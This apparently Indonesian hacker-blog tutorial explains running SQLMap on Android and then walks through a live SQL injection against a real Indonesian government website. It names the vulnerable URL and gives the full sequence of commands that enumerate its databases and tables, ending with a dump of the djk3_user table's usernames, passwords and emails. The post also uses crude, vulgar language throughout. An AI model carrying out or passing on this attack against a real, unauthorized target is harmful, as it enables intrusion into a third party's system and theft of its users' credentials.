Hai para hacker dan yang bukan hacker udah lah tong berhenti coli nape mending lu belajar bareng GSH disini :*
Kali ini gw mau jelasin tutor yang sedikit berbeda dari biasanya yaitu menjalankan SQLMap di android
buat kalian yang belum punya GNURoot Debian sebaiknya kalian baca tutorial ini dulu : Klik Di Sini ya
jika sudah baca dan dipraktekkan kalian bisa lanjutkan untuk membaca tutorial ini :* dan buat yg mastah tanpa baca tutorial yang sebelum nya jg gpp.
pertama pastikan GNURoot terinstall
Kemudian buka GNURoot Debian
alangkah baiknya buat folder khusus pentest dulu untuk menampung tool-tool hacking nanti nya dengan memasukkan perintah mkdir pentest kemudian tekan enter.
kemudian masukkan ke dalam folder pentest tadi dengan memasukkan perintah cd pentest kemudian tekan enter
kemudian install SQLMap dengan memasukkan perintah
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
kemudian tekan enter
biarkan proses instalasi berjalan
setelah selesai masuk ke folder sqlmap dengan memasukkan perintah cd sqlmap kemudian tekan enter
beri hak akses dengan memasukkan perintah chmod 777 sqlmap.py kemudian tekan enter
kemudian update dulu sqlmap nya dengan memasukkan perintah ./sqlmap.py --update kemudian tekan enter
mari kita coba langsung praktek live pentest dengan target nya https://djk.esdm.go.id/index.php/detail-berita?ide=4325 dengan memasukkan perintah
./sqlmap.py -u https://djk.esdm.go.id/index.php/detail-berita?ide=4325 --dbs
kemudian tekan enter
biarkan proses scanning berjalan
muncul wizard buat eksekusi jenis exploitasi nya ya tekan C kemudian tekan enter
biarkan proses injeksi SQL terus berjalan secara otomatis
dan database nya ketemu cek gambar dibawah biar jelas
disini gw mau injeksi SQLnya di database djk3 untuk ngecek isi tabel SQL nya jadi perintah nya adalah
./sqlmap.py -u https://djk.esdm.go.id/index.php/detail-berita?ide=4325 -D djk3 --table
kemudian tekan enter
setelah proses scanning selesai kemudian muncul lah tabel SQL nya dari database djk3
disini gw mau injksi SQL di tabel djk3_user buat cek isi kolom nya dengan memasukkan perintah
./sqlmap.py -u https://djk.esdm.go.id/index.php/detail-berita?ide=4325 -D djk3 -T djk3_user --columns
kemudian tekan enter
biarkan proses scanning dan injeksi berjalan
aahhh.... kimochi ketemu kolom nya :v
kemudian gw mau dump isi kolom nya djk3_user tadi dengan cara memasukkan perintah
./sqlmap.py -u https://djk.esdm.go.id/index.php/detail-berita?ide=4325 -D djk3 -T djk3_user -C id,username,password,email --dump
kemudian tekan enter.
done :v
gimana ya cara nya penggunaan nya kurang lebih sama dengan yang artikel sebelum nya yang di sini hanya saja beda nya platform aja gw bikin tutorial ini biar lu pade yang kerjaan nya sering koar-koar sambil coli ini ngerti.
oke sekian dan terimakasih
salam ngent*t